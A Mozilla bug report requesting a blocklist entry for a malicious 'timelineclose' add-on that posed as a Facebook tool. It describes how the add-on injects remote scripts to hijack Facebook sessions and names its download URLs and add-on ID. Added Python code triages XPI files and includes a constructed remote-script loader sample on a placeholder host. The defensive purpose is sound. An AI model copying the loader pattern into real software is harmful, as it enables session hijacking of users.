Bug 769781: Blocklist malicious 'timelineclose' add-on
Status: RESOLVED FIXED (opened 12 years ago, closed 12 years ago)
Category: Toolkit :: Blocklist Policy Requests, defect
Reporter: jorgev, Assigned: jorgev
Attachments: 1 file (23.26 KB, application/x-zip-compressed)

(Filing on Mark's behalf, due to Bugzilla problems)

Download URLs:
Chrome: www.timelineclose.com/index2.php
FF: www.timelineclose.com/index1.php

Analysis of zamantuneli.kadir.xpi
Metadata claims that it's written by Facebook to turn off timeline.
Add-on loads adobeflashplayer.js from its own code
Adobeflashplayer.js: Injects timelineclose.com/user/profil.js
Profile.js: Injects timelineclose.com/users/profil.php
Profil.php: Hijacks a victim's Facebook session and subscribes them to 18 Facebook accounts

It shouldn't claim to be a Facebook add-on and then hijack your session to subscribe you to multiple accounts of people you don't know.

Attached file has the add-on and remote JS. Password is 'malwares4mple'.

Comment 1 • 12 years ago (Assignee)
Id: {392e123b-b691-4a5e-b52f-c4c1027e749c}

Comment 2 • 12 years ago (Assignee)
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i109
Status: ASSIGNED → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED

Updated • 8 years ago
Product: addons.mozilla.org → Toolkit
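
The load chain in the description (a bundled script that injects a remote script) and the add-on ID from Comment 1 lend themselves to a static triage check on an XPI. The following is an added example, not code from the bug or from Mozilla; the sample archive, the `chrome/content/` path and the `scripts.example.invalid` host are constructed, and `triage_xpi` and `build_sample_xpi` are hypothetical helper names.

```python
import io
import re
import zipfile

# Add-on ID recorded in Comment 1 of this bug.
BLOCKED_IDS = {"{392e123b-b691-4a5e-b52f-c4c1027e749c}"}

# em:id written as an element (<em:id>..</em:id>) or an attribute (em:id="..").
EM_ID = re.compile(r'em:id\s*(?:>|=\s*")\s*([^<"\s]+)')
# Host of an absolute or protocol-relative URL assigned to a .src property.
REMOTE_SRC = re.compile(r"""\.src\s*=\s*["'](?:https?:)?//([^/"'\s]+)""")


def triage_xpi(data: bytes) -> dict:
    """Report manifest IDs, blocklist match, and remote script hosts per JS file."""
    report = {"ids": [], "blocked": False, "remote_scripts": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as xpi:
        for name in xpi.namelist():
            text = xpi.read(name).decode("utf-8", errors="replace")
            if name == "install.rdf":
                report["ids"] = EM_ID.findall(text)
                report["blocked"] = any(i.lower() in BLOCKED_IDS for i in report["ids"])
            elif name.lower().endswith(".js") and "createElement" in text:
                hosts = sorted({h.lower() for h in REMOTE_SRC.findall(text)})
                if hosts:
                    report["remote_scripts"][name] = hosts
    return report


def build_sample_xpi(addon_id: str, js: str) -> bytes:
    """Build a constructed XPI in memory (not the sample attached to the bug)."""
    rdf = ('<RDF xmlns:em="http://www.mozilla.org/2004/em-rdf#"><Description>'
           "<em:id>%s</em:id></Description></RDF>" % addon_id)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("install.rdf", rdf)
        z.writestr("chrome/content/adobeflashplayer.js", js)  # path is assumed
    return buf.getvalue()


# Constructed loader: a bundled script that injects a script from a remote host.
SAMPLE_JS = ('var s = document.createElement("script");\n'
             's.src = "http://scripts.example.invalid/user/loader.js";\n'
             "document.body.appendChild(s);\n")

if __name__ == "__main__":
    print(triage_xpi(build_sample_xpi(next(iter(BLOCKED_IDS)), SAMPLE_JS)))
```

A remote-script hit in a bundled file is a reason to review the add-on by hand, since the behaviour then depends on whatever the remote host serves.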